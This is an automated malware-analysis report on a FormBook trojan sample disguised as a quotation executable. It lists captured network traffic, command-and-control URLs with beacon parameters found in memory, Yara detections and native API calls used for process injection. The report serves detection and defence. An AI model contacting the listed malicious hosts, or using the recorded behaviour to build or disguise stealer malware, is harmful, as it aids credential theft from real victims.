20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 27 Aug 2024 06:44:59 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "663a05b6-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 06:45:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-litespeed-tag: 8cf_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://cchelvn.shop/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mNbyGI8aBV%2FoiBG1%2FYmu%2FFh4wj92U%2F2kEEnSmUcMBk3MU4NB3tjPSfmtv2pRWV6GTF5fDi8po4psmO5JYOin2VLQ9turi9%2F78745SUqnW5Mv3P66lyV5GOgQZefAJdZOqjeq"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b9a18c3db1742b9-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 39 30 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 58 eb 73 db 36 12 ff 7c fe 2b 20 74 46 26 6a 08 94 e4 57 22 9b 4e 5a c7 b9 eb 4d 52 67 e2 64 3a 37 96 27 03 91 4b 12 0a 09 b0 00 28 d9 a7 e8 7f bf 01 a9 07 25 cb 75 a7 bd 36 1f 1c 62 b1 8f df 2e f6 01 e8 bc f5 e6 fa f2 d3 7f 3e 5c a1 d4 e6 d9 c5 de b9 fb 0f 65 5c 26 01 06 d9 f9 7c 83 51 a1 21 16 f7 01 56 c9 00 a5 d6 16 66 e0 fb 2a 29 58 0e be 34 df 61 14 66 dc 98 00 67 8a 47 42 26 1d 23 2c 20 a9 3a 63 83 9d 3a e0 d1 c5 de 3f ce 73 b0 1c 85 29 d7 06 6c 80 3f 7f 7a db 79 81 91 ef 76 32 21 bf 22 0d 59 80 0b ad 62 91 01 46 a9 86 38 c0 ce d6 c0 f7 93 bc 48 98 d2 89 7f 1f 4b bf d7 7b 2c 25 64 32 e2 e1 d7 a6 98 83 18 86 29 64 13 c9 4c aa 0a ff 3e cf 74 11 b2 22 2d 2a f9 bd 7f b8 7f e7 26 d4 a2 b0 17 91 0a cb 1c a4 65 cb 8f ab 0c aa 75 e5 d9 cf 3c 07 14 a0 df c1 74 80 f6 d1 03 98 ce d8 a0 b1 f9 c2 43 2b 26 80 c6 66 ff dc 5f 18 da 6b 5a f5 e2 52 86 56 28 e9 b9 90 93 99 fb bb 61 71 93 c0 34 14 19 0f c1 f3 87 a3 2a ba c3 91 4f f7 c7 66 9f cc 89 f7 14 38 72 b6 b6 5d 1f 81 e4 39 04 78 22 60 5a 28 6d 31 0a 95 b4 20 6d 80 a7 22 b2 69 10 c1 44 84 d0 a9 16 14 09 29 ac e0 59 c7 84 3c 83 a0 0e Data Ascii: 904Xs6|+ tF&jW"NZMRgd:7'K(%u6b.>\e\&|Q!Vf*)X4afgGB&#, :c:?s)l?zyv2!"YbF8HK{,%d2)dL>t"-*&eu<tC+&f_kZRV(aq4*Of8r]9x"`Z(m1 m"iD)Y<
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 06:45:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-litespeed-tag: 8cf_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://cchelvn.shop/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VGqyRRTLYnqolhzsnwW0VIUwivqNj12tkyl1zkuVCvFLGzfePq7YsWD4MOmDhvhmXA8sHo3sgatSIVIwmmATywi4rMGdmCil3BruBclzBd6xJgmwEuUx8aqJmDw3D8VqfTVA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b9a18d3cee20f79-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 64 62 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 1a 69 73 9c 38 f6 f3 f8 57 60 5c d3 86 09 d0 d0 87 db a6 4d 26 3b 89 b3 47 65 c6 a9 38 a9 ad 2d b7 2b 25 d0 83 96 0d 12 23 89 3e d2 c3 7f df 12 f4 41 1f 8e bd de 9d 75 2a 09 3c bd 5b ef 92 f0 e5 f1 bb eb b7 9f ff f5 f1 4a 1b cb 2c 7d 7d 74 a9 fe d3 52 44 93 40 07 6a 7f b9 d1 b5 9c 43 4c 66 81 ce 12 5f 1b 4b 99 0b bf dd 66 49 ee 64 d0 a6 e2 44 d7 a2 14 09 11 e8 29 43 98 d0 c4 16 44 82 46 99 7d 2f 74 c5 0e 10 7e 7d f4 c3 65 06 12 69 d1 18 71 01 32 d0 bf 7c 7e 6f 9f eb 5a 5b ad a4 84 3e 68 1c d2 40 cf 39 8b 49 0a ba 36 e6 10 07 ba 92 e5 b7 db 49 96 27 0e e3 49 7b 16 d3 b6 e7 ed 53 11 9a 84 28 7a 68 92 29 15 a3 68 0c e9 84 3a 62 cc f2 f6 2c 4b 79 1e 39 f9 38 af e8 8f 7e 50 3f 97 22 e2 24 97 af 31 8b 8a 0c a8 74 56 0f 57 29 54 ef 95 65 bf a1 0c b4 40 7b 06 d2 2b ed 54 9b 83 b0 ef 85 76 2f be a2 48 92 09 68 f7 e2 f4 b2 bd 14 74 d4 94 6a c4 05 8d 24 61 d4 50 2e 37 17 ea df 2d 89 db 00 87 43 9e a2 08 8c f6 28 ac bc 3b 0a db d6 e9 bd 38 35 4b d3 78 4c 39 73 b8 91 5d 6f 01 45 19 04 fa 84 c0 34 67 5c ea 5a c4 a8 04 2a 03 7d 4a b0 1c 07 18 26 24 02 bb 7a b1 34 42 89 24 28 b5 45 84 52 08 6a d7 5f 1e db b6 76 03 88 47 Data Ascii: dbdis8W`\M&;Ge8-+%#>Au*<[J,}}tRD@jCLf_KfIdD)CDF}/t~}eiq2|~oZ[>h@9I6I'I{S(zh)h:b,Ky98~P?"$1tVW)Te@{+Tv/Hhtj$aP.7-C(;85KxL9s]oE4g\Z*}J&$z4B$(ERj_vG
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000042B2000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000004162000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://adindadisini15.click/vufj/?mvjDMBx8=
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000004C1E000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000004ACE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://fedoraproject.org/
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000037B4000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003664000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2755349497.000000003F914000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://gate-eight.net/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=4.01
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000037B4000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003664000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2755349497.000000003F914000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://gate-eight.net/wp-content/plugins/under-construction-page/themes/css/common.css?v=4.01
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000037B4000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003664000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2755349497.000000003F914000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://gate-eight.net/wp-content/plugins/under-construction-page/themes/css/font-awesome.min.css?v=4
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000037B4000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003664000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2755349497.000000003F914000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://gate-eight.net/wp-content/plugins/under-construction-page/themes/images/favicon.png
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000037B4000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003664000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2755349497.000000003F914000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://gate-eight.net/wp-content/plugins/under-construction-page/themes/light_bulb/light_bulb_off.pn
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000037B4000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003664000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2755349497.000000003F914000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://gate-eight.net/wp-content/plugins/under-construction-page/themes/light_bulb/style.css?v=4.01
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000037B4000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003664000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2755349497.000000003F914000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://gate-eight.net/wp-includes/js/jquery/jquery.min.js
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000004C1E000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000004ACE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
            Source: uExImirYECsTjI.exe, 00000008.00000002.4575428088.000000000585E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cchelvn.shop
            Source: uExImirYECsTjI.exe, 00000008.00000002.4575428088.000000000585E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cchelvn.shop/q1r7/
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000004120000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003FD0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.techcables.shop/0hup?gp=1&js=1&uuid=1724741004.9758137820&other_args=eyJ1cmkiOiAiLzBodXAi
            Source: PING.EXE, 00000009.00000002.4572589856.0000000003FD0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www70.techcables.shop/
            Source: PING.EXE, 00000009.00000002.4574773429.0000000007538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: PING.EXE, 00000009.00000002.4574773429.0000000007538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: PING.EXE, 00000009.00000002.4574773429.0000000007538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: PING.EXE, 00000009.00000002.4574773429.0000000007538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: PING.EXE, 00000009.00000002.4574773429.0000000007538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: PING.EXE, 00000009.00000002.4574773429.0000000007538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: PING.EXE, 00000009.00000002.4574773429.0000000007538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000037B4000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003664000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2755349497.000000003F914000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.bunny.net/css?family=Nunito:400
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
            Source: PING.EXE, 00000009.00000002.4566598381.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: PING.EXE, 00000009.00000002.4566598381.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: PING.EXE, 00000009.00000003.2645555577.000000000751A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: PING.EXE, 00000009.00000002.4566598381.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: PING.EXE, 00000009.00000002.4566598381.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: PING.EXE, 00000009.00000002.4566598381.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: PING.EXE, 00000009.00000002.4566598381.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.indeks.space&rand=
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003C6A000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003B1A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.cs0724sd92jj.cloud/dk4s/?mvjDMBx8=3h/m6gEkIEYHXtcNJZ5C3CADcygHFzVsLbB7LXK
            Source: PING.EXE, 00000009.00000002.4574773429.0000000007538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.00000000048FA000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4574589636.0000000005A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.indeks.space&utm_medium=parking&utm_campaign=s_land_ser
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.indeks.space&utm_medium=parking&utm_campaign=s_land_ne
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.indeks.space&utm_medium=parking&utm_campaign=s_land_host&
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.indeks.space&utm_medium=parking&utm_campaign=s_land_cms
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.indeks.space&utm_medium=parking&utm_cam
            Source: uExImirYECsTjI.exe, 00000008.00000002.4573331748.0000000003AD8000.00000004.80000000.00040000.00000000.sdmp, PING.EXE, 00000009.00000002.4572589856.0000000003988000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.indeks.space&amp;reg_source=parking_auto

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.Quotation-27-08-24.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.Quotation-27-08-24.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4571817577.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2478449837.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4571765564.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4575428088.0000000005800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2471796851.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 4.2.Quotation-27-08-24.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 4.2.Quotation-27-08-24.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.4571817577.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2478449837.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.4571765564.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4575428088.0000000005800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2471796851.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Quotation-27-08-24.exe
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0042C443 NtClose,4_2_0042C443
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2B60 NtClose,LdrInitializeThunk,4_2_00FA2B60
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_00FA2C70
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_00FA2DF0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA35C0 NtCreateMutant,LdrInitializeThunk,4_2_00FA35C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA4340 NtSetContextThread,4_2_00FA4340
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA4650 NtSuspendThread,4_2_00FA4650
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2AF0 NtWriteFile,4_2_00FA2AF0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2AD0 NtReadFile,4_2_00FA2AD0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2AB0 NtWaitForSingleObject,4_2_00FA2AB0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2BF0 NtAllocateVirtualMemory,4_2_00FA2BF0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2BE0 NtQueryValueKey,4_2_00FA2BE0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2BA0 NtEnumerateValueKey,4_2_00FA2BA0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2B80 NtQueryInformationFile,4_2_00FA2B80
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2CF0 NtOpenProcess,4_2_00FA2CF0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2CC0 NtQueryVirtualMemory,4_2_00FA2CC0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2CA0 NtQueryInformationToken,4_2_00FA2CA0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2C60 NtCreateKey,4_2_00FA2C60
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2C00 NtQueryInformationProcess,4_2_00FA2C00
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2DD0 NtDelayExecution,4_2_00FA2DD0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2DB0 NtEnumerateKey,4_2_00FA2DB0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2D30 NtUnmapViewOfSection,4_2_00FA2D30
